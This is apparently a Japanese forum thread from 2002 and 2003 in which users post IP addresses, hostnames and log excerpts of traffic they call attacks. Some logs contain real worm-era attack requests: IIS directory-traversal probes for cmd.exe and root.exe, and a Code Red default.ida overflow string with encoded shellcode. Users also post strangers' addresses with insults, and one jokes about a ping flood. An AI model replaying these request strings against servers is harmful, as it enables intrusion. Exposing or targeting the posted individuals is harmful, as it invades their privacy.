それなら困るだろうな。
302299:02/12/14 23:59
>>300
ですよね!
PC初心者板では出来るって言ってる人が何人も・・・
>>294 apacheを下手くそにインストールしてると/iconsが
外からもアクセスできるという罠。
304299:02/12/15 00:00
>>301
東京ですが何か?
305299:02/12/15 00:04
>>300
じゃあ、アクセスポイントを変えるだけで2chのスレが立て放題ってのも嘘ですよねぇ?
奥多摩
307299:02/12/15 00:06
マジレス下さい。
308299:02/12/15 00:08
あとPC番号から同一人物を見抜くって言うけど、あれは荒らしに対する脅しですよね?


  ・えさを与えないでください

>>299 南鳥島とか… (w
FQDNから地域が推測できるISPも存在する。
tracerouteかければルータのFQDNから推測できる場合もある。
>>299
もし、キミがダイアルアップで接続してるのなら、名前に
fusianasan
と入れて再度書きこみを見てみれば?

そこに***TKY***とか出れば東京だとわかる。
***.***.***.***の数字だけなら、プロバイダ所在地ぐらいはワカルかも。
>>309
す、スマン・・・そういうことだったのか。
313299 U063072.ppp.dion.ne.jp:02/12/15 00:18
>>311
***.***.***.***ってマニアックなプロバイダでしょ?
このスレはIP厨の掃き溜めだから活用されると困るんだよね。
機能すると困るスレ。変なスレだ。

あと質問は初級ネットかPC初心者でやれ。
このスレに書きこみに来る時点で基礎知識が無い。
315299 U063072.ppp.dion.ne.jp:02/12/15 00:25
>もし、キミがダイアルアップで接続してるのなら、名前に
>fusianasan
>と入れて再度書きこみを見てみれば?

これは何でダイヤルアップならってなってるんですか?
ADSLだといけないんですか?
教えて下さい、この通りです!m(_ _)m
有効活用しつつ埋め立てちまおう。
317299 U063072.ppp.dion.ne.jp:02/12/15 00:30
ADSLでIPアドレス晒すとマズイの?
[email protected]
こいつどうよ
9 14 ms 14 ms <10 ms 210.163.230.106
10 14 ms 13 ms 14 ms gsr-otee4.kddnet.ad.jp [203.181.97.217]
11 14 ms <10 ms 13 ms otergs002.kddnet.ad.jp [203.181.97.198]
12 <10 ms 14 ms 14 ms oteGW04.v4.kddi.ne.jp [203.140.128.90]
13 13 ms 14 ms 14 ms tkyCORE02.v4.kddi.ne.jp [210.238.128.221]
14 14 ms 14 ms <10 ms tky3CORE02.v4.kddi.ne.jp [210.238.128.58]
15 14 ms 28 ms 13 ms ngnRT04.v4.kddi.ne.jp [218.222.0.134]
13,14,15あたりから東京という事が推測できるけど、それで困るのか?
>>314,316
ラジャ♥
>>319>>299へのレスだ。
あとIP言うな!!
322299 U063072.ppp.dion.ne.jp:02/12/15 00:37
>>321
実は東京ではありません。スマソ

僕が某サイトでアク禁になったとき、dionユーザー全員がアク禁になるのか知りたかったんです。
>>319 15は長野かも
324299 U063072.ppp.dion.ne.jp:02/12/15 00:41
>>323
違います
325299 U063072.ppp.dion.ne.jp:02/12/15 00:43
プロバイダから先のアクセスポイントまでは辿れないんですよね?少なくともdionは
そもそもダイヤルアップってアクセスポイントとかないよね?
61.213.136.18
sip1-18.dsnw.ne.jp
こいつしつこすぎ。
なんなの?もう50回くらいあたっくしてきてるよ。
327名無しさん@お腹いっぱい。:02/12/15 02:09
本日たった今、
207.33.111.37
からWeLLノートンポートを全て総スキャソされました
>>326-327
だからどうしたって言うんだ。
329327:02/12/15 02:13
>>328
スレタイをよく読め
まあ、WeLLノートンポートだからな。仕方ない。
331名無しさん@お腹いっぱい。:02/12/15 02:19
スプーフィングて知ってるか?
>>327
>>1はTCP確立させて晒しているぞ。お前はそれをしていない。
この意味がわからないんだろうな。馬鹿だから。
>>332
よくみて味噌。ノートンポートだよ。 エサじゃないの?
334名無しさん@お腹いっぱい。:02/12/15 11:20
5 :J053224.ppp.dion.ne.jp :02/12/15 10:40 ID:Hl/DvHL1







http://freeweb2.kakiko.com/dengeki/indexs.htm
slip-12-65-120-92.mis.prserv.net
336名無しさん@お腹いっぱい。:03/01/13 23:45
219.145.190.120 - - [13/Jan/2003:20:23:11 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 296 "-" "-"
219.68.11.114 - - [12/Jan/2003:18:52:43 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 296 "-" "-"
337名無しさん@そうだ選挙にいこう:03/01/14 07:04
あのさ、これって異常じゃねえ?時間がGMTね。
2003-01-13 08:40:46 80.130.182.226 HEAD /index.asp 200
2003-01-13 08:40:49 80.130.182.226 HEAD /root.exe 404
2003-01-13 08:40:52 80.130.182.226 HEAD /scripts/root.exe 404
2003-01-13 08:40:55 80.130.182.226 HEAD /msadc/root.exe 404
2003-01-13 08:40:59 80.130.182.226 HEAD /wwwroot/root.exe 404
2003-01-13 08:41:02 80.130.182.226 HEAD /images/root.exe 404
2003-01-13 08:41:05 80.130.182.226 HEAD /samples/root.exe 404
2003-01-13 08:41:08 80.130.182.226 HEAD /iissamples/root.exe 404
2003-01-13 08:41:11 80.130.182.226 HEAD /adsamples/root.exe 404
2003-01-13 08:41:14 80.130.182.226 HEAD /cgi-bin/root.exe 404
338名無しさん@そうだ選挙にいこう:03/01/14 07:05
2003-01-13 08:41:17 80.130.182.226 HEAD /iisadmpwd/root.exe 404
2003-01-13 08:41:20 80.130.182.226 HEAD /cmd1.exe 404
2003-01-13 08:41:24 80.130.182.226 HEAD /scripts/cmd1.exe 404
2003-01-13 08:41:26 80.130.182.226 HEAD /msadc/cmd1.exe 404
2003-01-13 08:41:29 80.130.182.226 HEAD /wwwroot/cmd1.exe 404
2003-01-13 08:41:35 80.130.182.226 HEAD /images/cmd1.exe 404
2003-01-13 08:41:38 80.130.182.226 HEAD /samples/cmd1.exe 404
2003-01-13 08:41:41 80.130.182.226 HEAD /iissamples/cmd1.exe 404
2003-01-13 08:41:44 80.130.182.226 HEAD /adsamples/cmd1.exe 404
2003-01-13 08:41:47 80.130.182.226 HEAD /cgi-bin/cmd1.exe 404
339名無しさん@そうだ選挙にいこう:03/01/14 07:05
2003-01-13 08:41:50 80.130.182.226 HEAD /iisadmpwd/cmd1.exe 404
2003-01-13 08:41:57 80.130.182.226 HEAD /scripts/shell.exe 404
2003-01-13 08:42:01 80.130.182.226 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500
2003-01-13 08:42:07 80.130.182.226 HEAD /winnt/system32/cmd.exe 404
2003-01-13 08:42:10 80.130.182.226 HEAD /scripts/..チ../winnt/system32/cmd.exe 500
2003-01-13 08:42:13 80.130.182.226 HEAD /scripts/..タ%9v../winnt/system32/cmd.exe 500
2003-01-13 08:42:16 80.130.182.226 HEAD /scripts/..タ%qf../winnt/system32/cmd.exe 500
2003-01-13 08:42:19 80.130.182.226 HEAD /scripts/..チ%8s../winnt/system32/cmd.exe 500
2003-01-13 08:42:22 80.130.182.226 HEAD /winnt/system32/cmd.exe 404
2003-01-13 08:42:25 80.130.182.226 HEAD /scripts/..チ%pc../winnt/system32/cmd.exe 500
340名無しさん@そうだ選挙にいこう:03/01/14 07:06
2003-01-13 08:42:28 80.130.182.226 HEAD /scripts/..o../winnt/system32/cmd.exe 404
2003-01-13 08:42:31 80.130.182.226 HEAD /scripts/winnt/system32/cmd.exe 404
2003-01-13 08:42:35 80.130.182.226 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500
2003-01-13 08:42:38 80.130.182.226 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500
2003-01-13 08:42:41 80.130.182.226 HEAD /scripts/..%2f../winnt/system32/cmd.exe 500
2003-01-13 08:42:44 80.130.182.226 HEAD /scripts/..%5c../winnt/system32/cmd.exe 500
2003-01-13 08:42:47 80.130.182.226 HEAD /winnt/system32/cmd.exe 404
2003-01-13 08:42:50 80.130.182.226 HEAD /scripts/..ッ../winnt/system32/cmd.exe 404
2003-01-13 08:42:53 80.130.182.226 HEAD /scripts/..ッ../winnt/system32/cmd.exe 404
2003-01-13 08:42:56 80.130.182.226 HEAD /scripts/..・ッ../winnt/system32/cmd.exe 404
341名無しさん@そうだ選挙にいこう:03/01/14 07:06
2003-01-13 08:42:59 80.130.182.226 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
2003-01-13 08:43:02 80.130.182.226 HEAD /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 500
2003-01-13 08:43:05 80.130.182.226 HEAD /scripts/..チ..チ..チ..チwinnt/system32/cmd.exe 500
2003-01-13 08:43:08 80.130.182.226 HEAD /winnt/system32/cmd.exe 404
2003-01-13 08:43:11 80.130.182.226 HEAD /winnt/system32/cmd.exe 404
2003-01-13 08:43:14 80.130.182.226 HEAD /winnt/system32/cmd.exe 404
2003-01-13 08:43:17 80.130.182.226 HEAD /scripts/winnt/system32/cmd.exe 404
2003-01-13 08:43:20 80.130.182.226 HEAD /scripts/.%2e/.%2e/winnt/system32/cmd.exe 500
2003-01-13 08:43:23 80.130.182.226 HEAD /scripts/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
2003-01-13 08:43:26 80.130.182.226 HEAD /scripts/..%5c..%5cwinnt/system32/cmd.exe 500
342名無しさん@そうだ選挙にいこう:03/01/14 07:09
>>337-341 の続き
(省略256件)
2003-01-13 08:58:23 80.130.182.226 HEAD /..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
長いから省略ね。
いろんなパターン試してるよ。
こっちは、ちゃんとパッチあててるっつーの。
343名無しさん@そうだ選挙にいこう:03/01/14 07:14
全部で306件。途中で気づいたからルータの設定切ったけど。
(ほっといてもよかったんだけど、やっぱうざいから)
このまま放置してたらどこまで続いたんだろう?
344名無しさん@お腹いっぱい。:03/01/14 22:58
162.73.4.22

・・・・かなりウジャイ・・・
最近こいつばっか。
345山崎渉:03/01/15 15:39
(^^)
346名無しさん@お腹いっぱい。:03/01/16 12:47
130.54.248.158
く せ え
このスレは、アタッカーとワームの区別もつかんやつが集まってるようだね。
さすが2ch、厨房の集まりだな。
ここは隔離スレッドです
2003/01/16 07:02:00 210.80.197.158:80 aaa.bbb.ccc.ddd:3006 ポート 3006 (TCP)
2003/01/16 07:02:00 210.80.197.158:80 aaa.bbb.ccc.ddd:3006 ポート 3006 (TCP)
2003/01/16 21:02:57 210.80.197.158:80 aaa.bbb.ccc.ddd:3006 ポート 3006 (TCP)
2003/01/16 21:03:45 210.80.197.158:80 aaa.bbb.ccc.ddd:3055 ポート 3055 (TCP)
2003/01/16 21:04:45 210.80.197.158:80 aaa.bbb.ccc.ddd:3062 ポート 3062 (TCP)
2003/01/16 21:23:50 210.80.197.158:80 aaa.bbb.ccc.ddd:3265 ポート 3265 (TCP)
2003/01/16 23:03:35 210.80.197.158:80 aaa.bbb.ccc.ddd:3467 ポート 3467 (TCP)
2003/01/16 23:05:50 210.80.197.158:80 aaa.bbb.ccc.ddd:3516 ポート 3516 (TCP)
2003/01/16 23:06:44 210.80.197.158:80 aaa.bbb.ccc.ddd:3574 ポート 3574 (TCP)
2003/01/16 23:09:07 210.80.197.158:80 aaa.bbb.ccc.ddd:3609 ポート 3609 (TCP)
2003/01/16 23:27:54 210.80.197.158:80 aaa.bbb.ccc.ddd:3658 ポート 3658 (TCP)
2003/01/17 20:40:09 210.80.197.158:80 aaa.bbb.ccc.ddd:1049 ポート 1049 (TCP)
2003/01/17 20:41:06 210.80.197.158:80 aaa.bbb.ccc.ddd:1067 ポート 1067 (TCP)
2003/01/17 23:42:34 210.80.197.158:80 aaa.bbb.ccc.ddd:3109 ポート 3109 (TCP)
2003/01/18 00:58:45 210.80.197.158:80 aaa.bbb.ccc.ddd:3107 ポート 3107 (TCP)
2003/01/18 01:22:31 210.80.197.158:80 aaa.bbb.ccc.ddd:3307 ポート 3307 (TCP)
2003/01/18 17:48:50 210.80.197.158:80 aaa.bbb.ccc.ddd:4237 ポート 4237 (TCP)
2003/01/18 21:28:03 210.80.197.158:80 aaa.bbb.ccc.ddd:3006 ポート 3006 (TCP)
2003/01/18 22:11:59 210.80.197.158:80 aaa.bbb.ccc.ddd:3138 ポート 3138 (TCP)

漏れのIPはaaa.bbb.ccc.dddに置き換えてある。
210.80.197.158は何者だろう?
>>349
そこに疑問を持つ前にSourcePortが80であることに疑問を持てよ。
860 :名無しさん@3周年 :03/01/22 17:00
http://life.2ch.net/test/read.cgi/psy/1038396164/l50
>>855に同じく
俺のIPも出ていないが、いつ出して晒してくれるのですか  藁


踏み台のIP晒してどうするの?
>>352
しっしーー、それを言っちゃダメだよ
354名無しさん@お腹いっぱい。:03/01/23 01:15
211.123.229.140 こいつkansaiやねん。
355名無しさん@お腹いっぱい。:03/01/23 19:47
61.180.94.131
356あぼーん:あぼーん
あぼーん
211.135.255.206
358$:03/01/24 07:36
Fri Jan 24 07:29:49/2003 SOCKS: Can't connect to server 207.46.104.20, port 1863
アタックNo1
210.196.191.85から23にスキャン。
361( ・ω・)y─~~~~:03/01/25 19:03
*.jsのアタッカー?

03/01/25 19:00:05 通信の要求 210.158.219.38 TCP(1887)
362名無しさん@お腹いっぱい。:03/01/25 21:37
内容としては、侵入方法、防御方法、侵入された場合の対処方法
についてお話したいと考えてます。
---------------------------------------------------
   有限会社マギシステム
   片山 昌樹  / Masaki Katayama
   Phone:03-5956-2926 / Net FAX : 020-4622-4260
E-Mail:[email protected]
http://www.magi.co.jp/
---------------------------------------------------
363加州だと:03/01/28 09:22
IP Address List HostName Aliases
63.187.169. 0 sdn-ap-017castocP2542.dialsprint.net
364bitch:03/01/28 10:45
アタッカーて訳でもないが、他人のアドレスで勝手にメルマガ登録する
困ったさんです。スレ違い?スマソ・・・。

●登録日時: 2003/01/28 09:05:45
●登録時IPアドレス: 210.131.173.187

●登録日時: 2003/01/28 09:05:52
●登録時IPアドレス: 210.131.173.187

●登録日時: 2003/01/28 09:06:24
●登録時IPアドレス: 210.131.173.187


....登録IPが一緒なんだけど(笑)。
WhoISの結果とかって、晒していいもんなんでしょうか?
>>364
板違い。ネットワークセキュリティに関係ない。
366名無しさん@お腹いっぱい。:03/01/28 15:44
21日から133.100.9.2からPORT 123にしきりに来るんですが他に来てる人居ません?
当方フレッツISDNで3分で切れるようにしてるんでしょっちゅうIP変わるんですが
しつこく来るんですよね。
それともLAN内のPCがウイルスにやられてるのかなぁ。
>>366
今日ポート12345に来ますた

へへへ いただき!!!
1000ゲト
218.222.180.235
ポート6699に来た

MXつけっぱで外出してかえってくるとたまにアタックされてるが
370名無しさん@お腹いっぱい。:03/01/29 02:07
>>369

>ポート6699に来た
だからそれ、MXじゃないの?
>>364
ハア?
372名無しさん@お腹いっぱい。:03/01/29 08:54
03/01/28 14:12:54 ICMP Traffic n/a 24-193-45-49.nyc.rr.com Echo Reply/0 送信 LocalHost ICMP Echo Reply/0 00:00:00
03/01/28 14:12:54 ICMP Traffic n/a 24-193-45-49.nyc.rr.com Echo Request/0 受信 LocalHost ICMP Echo Request/0 00:00:00
>>371
364が発行してるメルマガに他人のアドレスで勝手に登録してくる奴のIPだろ。
374名無しさん@お腹いっぱい。:03/01/29 23:03
こんなパケットがきました。で、このサイトIP逆引きできないし、
匿名FTP外部に公開してるし(カレントディレクトリ設定してないから
入れないようだけど)なんか、踏台っぽいな。

ちなみにWho isすると...まぁ興味のあるひとがやってみればいいか。

210.150.186.180:13611 -> aaa.bbb.ccc.ddd:57875 INVALIDACK *2*A*RS* RESERVEDBITS
210.150.186.180:0 -> aaa.bbb.ccc.ddd:0 NULL ********
210.150.186.180:57992 -> aaa.bbb.ccc.ddd:53824 VECNA 12**P*** RESERVEDBITS
210.150.186.180:53830 -> aaa.bbb.ccc.ddd:26148 UNKNOWN 1****R** RESERVEDBITS
>>374
パケット壊れてるぽ。つーか、お前と同じFW使って無くてもわかるように16進ダンプにしろよ。
>>374
InfoSphere (株式会社NTTPCコミュニケーションズ) の配下にあって………
ぶわははははは 激しくワロタ (w

興味がある人はWebサイト見てみるべし!(藁
ちなみにwhoisで出てきたコレって、以前「彼氏募集中」なSPAM送ってきたヤシが
名乗ってた名前だったような気が……

# そろそろスレ違い気味なんでsage
378374:03/01/30 00:11
>>375
パケットのヘッダを詐称(Spoofing)しているんだとおもわれ。
Snortでログとっていただけだから16進ダンプはなくてね...スマソ
219.107.149.185

こいつトロイばっか送りつけてきやがる
うざすぎ
380名無しさん@お腹いっぱい。:03/01/30 00:17
2003/01/29 19:59:18Rst attack68.164.118.85 -> 68.164.118.85
2003/01/29 20:59:20Rst attack68.164.118.85 -> 68.164.118.85
2003/01/29 23:59:27Rst attack68.164.118.85 -> 68.164.118.85
「トロイの木馬のデフォルト遮断 によって検出しました」というメッセージをトロイ送ってきていると勘違いしている
馬鹿はとっとと死んでくれ。
3826588って何でしょ?:03/01/30 00:37
29/01/2003 22:06:12.467584 pppoe0 @100:13 b 195.117.126.24,26464 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN
29/01/2003 22:06:13.463107 pppoe0 @100:13 b 195.117.126.24,30953 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN
29/01/2003 22:06:14.318802 pppoe0 @100:13 b 195.117.126.24,15872 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN
29/01/2003 22:06:15.272010 pppoe0 @100:13 b 195.117.126.24,43083 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN
29/01/2003 22:06:16.206179 pppoe0 @100:13 b 195.117.126.24,38675 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN
29/01/2003 22:06:17.139994 pppoe0 @100:13 b 195.117.126.24,22840 -> xxx.xxx.xxx.xxx,6588 PR tcp len 20 64 -S IN
このスレは、whoisの結果を貼りつけると
どこにいるかもしれない相手がビビると思ってたり
自分の「ふぁいあーうぉーる」でブロックされたIPアドレスを公開すると
世の中が良くなると信じている人たちの隔離場所です。

>>382
質問は適当な質問スレへどうぞ。
384名無しさん@お腹いっぱい。:03/01/30 01:05
いいえ、単なる自己満足スレッドです。
385名無しさん@お腹いっぱい。:03/02/11 12:20
U170194.ppp.dion.ne.jp 死国の猿
p1125-ip01oomichi.oita.ocn.ne.jp  大分在住の元死国の猿
80.136.106.76
Fuck
387名無しさん@お腹いっぱい。:03/02/15 08:01
IP 219.165.249.80 ホスト n249080.ap.plala.or.jp 固定IPっぽいですw
アフォですなw
388387:03/02/15 08:32
固定じゃなかったw(爆)
202.229.198.199
210.81.226.212
211.239.163.19
202.168.201.129
逝ってよし。
218.5.3.150
うぜえ
391山崎渉:03/04/17 12:27
(^^)
392山崎渉:03/04/20 06:09
   ∧_∧
  (  ^^ )< ぬるぽ(^^)

Cykhm17DS20.kng.mesh.ad.jp
394ほれっ:03/05/07 14:10
210.136.232.249
210.138.60.216
395f-ibaraki-193232.zero.ad.jp:03/05/21 08:02
f-ibaraki-193232.zero.ad.jp
396山崎渉:03/05/22 01:59
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
397山崎渉:03/05/28 17:14
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉
398名無しさん@お腹いっぱい。:03/06/09 00:55
81.2.168.51
デンマークの電波な香具師のIP
マジ困ってる、こいつヤバイ、超ヤバイ

どれ位ヤバイかっていうと、ヤらせろってメールきたんよ
俺は男だってかえしたら
俺も男だってきたんよ



や ら な い か ?
なのか?
とりあえずPING爆弾でも送っとくか…
399無料動画直リン:03/06/09 01:10
400_:03/06/09 01:10
>>398
やらしてやるからすぐに来いといってやれ。
211.194.69.250
koreaから来た。クソッタレ
403名無しさん@お腹いっぱい。:03/06/12 21:04
68.69.35.32
最近毎日だよ・・・・
404名無しさん@お腹いっぱい。:03/06/12 21:33
68.55.251.155

なんか不審なきがする。だれか調査してくれ。
218.145.25.49 - - [21/Apr/2003:14:21:43 +0900] "GET /robots.txt HTTP/1.0" 200 391 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:49 +0900] "GET / HTTP/1.0" 200 13502 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:49 +0900] "GET /2002/bnlcortisiciliani/corti.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:49 +0900] "GET /2002/cinemadalmondo/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:49 +0900] "GET /2002/convegno/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:50 +0900] "GET /2002/diamondaward/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:50 +0900] "GET /2002/english/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:50 +0900] "GET /2002/grandecinema/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:50 +0900] "GET /2002/leone/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:50 +0900] "GET /2002/marilynforever/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:51 +0900] "GET /2002/morrissey/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:51 +0900] "GET /2002/mostre/mostre.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:51 +0900] "GET /2002/nastridargento/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:51 +0900] "GET /2002/programma/programma.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:51 +0900] "GET /2002/pubblicazioni/pubblicazioni.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:52 +0900] "GET /2002/rassegna_stampa/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:52 +0900] "GET /2002/servizi/default.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:52 +0900] "GET /2002/showcase.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:52 +0900] "GET /2002/sponsor/sponsor.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
218.145.25.49 - - [21/Apr/2003:14:21:52 +0900] "GET /2002/ticketone.asp HTTP/1.0" 404 921 "-" "dloader(NaverRobot)/1.0"
407405:03/06/13 03:55
等、58行に渡る。
他人のHPに管理人のフリをして悪質レスをしまくる。
6月13日(金)02時50分11秒
Remote Host: 61-205-102-8.eonet.ne.jp
大阪の基地害女には何を送るべき?
24.186.119.129

トロイ送りつけてきやがった。アメリカ人は氏ねよ。
410名無しさん@お腹いっぱい。:03/06/17 09:10
hmmt127163.catv.ppp.infoweb.ne.jp
板TOPより転載

この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
2ちゃんねるでは荒らし依頼は出来ません。
また、この板ではアタック依頼は受け付けません。
攻撃依頼を見かけた方は、放置してください。
ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。
412_:03/06/17 09:29
413名無しさん@お腹いっぱい。:03/06/17 09:31
このスレの人は、

踏み台やバウンダーやパラサイトの類の可能性を信じない人たちですか?
厨房隔離スレですから…
415名無しさん@お腹いっぱい。:03/06/18 08:08
61.26.183.111
最近サイトに荒らしが来るのだが、このIPをサーチすると
国がAUになる。
オーストラリア等の串で荒らしてるということですか??

うん、そうだよ。
68.42.30.212 - - [18/Jun/2003:17:14:35 +0900] "POST http://210.***.***.***:25/ HTTP/1.1" 403 307
210.240.71.131 - - [18/Jun/2003:17:15:35 +0900] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278
うぜぇ
p6237-ip02souka.saitama.ocn.ne.jp
419名無しさん@お腹いっぱい。:03/06/18 23:01
FLA2Abj190.osk.mesh.ad.jp
虎戦士 
420電話屋:03/06/19 01:33
64.71.177.66 biwa38.he.net
OrgName Hurricane Electric
OrgID HURC
Address 3433 Rockett Drive
City Fremont StateProv CA Postalcode 94538 Country US

カリフォルニア Sunnyvale だってさ。
11回もありがとうございました。
421電話屋:03/06/19 01:38
すみません まねして自分の所に来たやつを載せてみたんだけど
意味あるのかな?
お役にたてますか?これでなんか分かるんですか?初心者なんで怒らないでください。
422名無しさん@お腹いっぱい。:03/06/19 07:16
なにを11回なんだ?それによるだろ?
423名無しさん@お腹いっぱい。:03/06/19 07:57
>>417
それってアッタクなんですか?
424電話屋:03/06/19 08:02
>417さんの はじめ 〇にみえたがそれって ×だよねえー
 
>422さん 初心者なんでよくわかんないんだよ。
 ルーター通り越してFWまできたんだよ。
 危険度 高  だって。。
425((≡ ̄♀ ̄≡)):03/06/19 08:05
ここなっつにかもん!
http://homepage3.nifty.com/coco-nut/
426422:03/06/19 11:37
>>電話屋さん
やはり、良く分からん。。。
ルータを通ってFWにアクセスが11回あったってこと?
ルータのルーティング設定によってちゃあ、普通に通すこともあり得る。
でもFWでちゃんとハジいてんでしょ?だったら大丈夫だろ。
心配だったらルータの設定見なおしてみれば。
鯖立てて、ポートフォワードしてたりしない?

>>423
ある意味アタックだが、ありふれすぎてて話題にもしたくない内容だ。
しかも古い・・・

久しぶりにマジレス(藁
>>421
こんな糞スレで質問せずに質問スレでやればいいのに…

セキュリティ初心者質問スレッドpart25
http://pc.2ch.net/test/read.cgi/sec/1054458698/l50
このスレは隔離スレなので質問は質問スレッドでどうぞ。

セキュリティ初心者質問スレッドpart25
http://pc.2ch.net/test/read.cgi/sec/1054458698/l50

ネットワークの基本が分からない方は、
初級ネットワーク板http://pc.2ch.net/hack/を
ROMることをお勧めします。
64.71.177.66
HTTP_IIS_ISAPI_Extension攻撃(藁
430名無しさん@お腹いっぱい。 :03/06/19 12:11
156.34.179.38 - - [19/Jun/2003:00:57:58 +0900] "OPTIONS / HTTP/1.1" 403 290 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"

画面がすくろーるしちまったよ。30回ぐらいアクセスしてきた。
431名無しさん@お腹いっぱい。:03/06/19 18:17
もっとスゴイアッタク教えて下さい。
345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp
345 名前: エロ本屋 投稿日: 03/06/19 18:25 HOST:EAOcf-321p227.ppp15.odn.ne.jp

消えろODN基地外ユーザー
おまいら踏み台のIP晒して楽しいか?
24.95.232.113
435名無しさん@お腹いっぱい。:03/06/20 06:39
IP晒すんなら踏み台遡って攻撃元まで晒せ。
436電話屋:03/06/20 09:17
>435
どーやんの? 
 
>>429  同じIPだねえ。。。
アフォは消えろ
糞スレあげんな
438電話屋:03/06/20 10:34
よくわからないねえ。。。

何を主張したいの?
>何を主張したいの?
糞スレあげんな
初級ネットワーク板 http://pc.2ch.net/hack/
sage進行でおながいします(E-mail欄に半角でsageと入れる)。

IP晒すなら、踏み台遡って攻撃元まで晒すようおながいします。
踏み台か攻撃元か判別できない方、どうやれば遡れるのか分からない方は
書き込まないことを推奨します。
210.153.146.238
443電話屋:03/06/20 22:51
438 は 私のふりして 書き込んだな。。。
>441 今回は sage で書き込みしました。

444名無しさん@お腹いっぱい。:03/06/23 16:35
FM-4735B71DD3F7
172.17.17.4
202.148.142.14
埋め立て
64.216.218.54
447 :03/06/25 22:19
218.123.72.69
まったく
>>447
バカは氏ね
おまいら踏み台のIP晒して楽しいか?
